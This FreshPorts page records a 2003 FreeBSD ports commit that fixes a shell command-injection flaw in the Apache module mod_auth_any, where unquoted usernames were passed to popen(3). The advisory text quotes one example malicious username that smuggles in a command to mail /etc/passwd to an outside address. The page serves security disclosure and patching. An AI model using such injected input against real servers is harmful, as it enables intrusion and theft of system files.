FreshPorts -- The Place For Ports If you buy from Amazon USA, please support us by using this link.
Follow us

I am looking for an LTO tape library. Do you have one to spare?
Commit found by message id
Tue, 25 Mar 2003
[ 04:23:11 lioux ] Original commit 
mod_auth_any www  Deleted Deprecated Expired files touched by this commit Apache module to use any command line program to authenticate a user
o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <> [1]
Obtained from:  mod_auth_any CVS [2],

Number of ports [& non-ports] in this commit: 1

Showing files for just one port: www/mod_auth_any

show all files

hide all files

3 files found
modify 1.6 View diff View revision /ports/head/www/mod_auth_any/Makefile
import 1.1 View revision /ports/head/www/mod_auth_any/files/bash_single_quote_escape_string.c
import 1.1 View revision /ports/head/www/mod_auth_any/files/patch-mod_auth_any.c
User Login
Create account

Servers and bandwidth provided by
New York Internet, SuperNews, and RootBSD

This site
What is FreshPorts?
About the authors
How big is it?
The latest upgrade!

Enter Keywords:

Latest Vulnerabilities
i2pJul 28
i2pJul 28
i2pJul 28
bugzilla44Jul 25
apache22Jul 24
apache22-event-mpmJul 24
apache22-itk-mpmJul 24
apache22-peruser-mpmJul 24
apache22-worker-mpmJul 24
firefoxJul 23
firefox-develJul 23
firefox-esrJul 23
firefox10Jul 23
firefox15Jul 23
firefox3Jul 23

11 vulnerabilities affecting 34 ports have been reported in the past 14 days

* - modified, not new

All vulnerabilities

Deleted ports
Sanity Test Failures

NEW Graphs (Javascript)

Calculated hourly:
Port count 24400
Broken 181
Deprecated 816
Ignore 516
Forbidden 16
Restricted 263
No CDROM 101
Vulnerable 28
Expired 1
Set to expire 803
Interactive 13
new 24 hours 6
new 48 hours6
new 7 days19
new fortnight40
new month105

Servers and bandwidth provided by
New York Internet, SuperNews, and RootBSD
Valid HTML, CSS, and RSS.
Copyright © 2000-2014 Dan Langille. All rights reserved.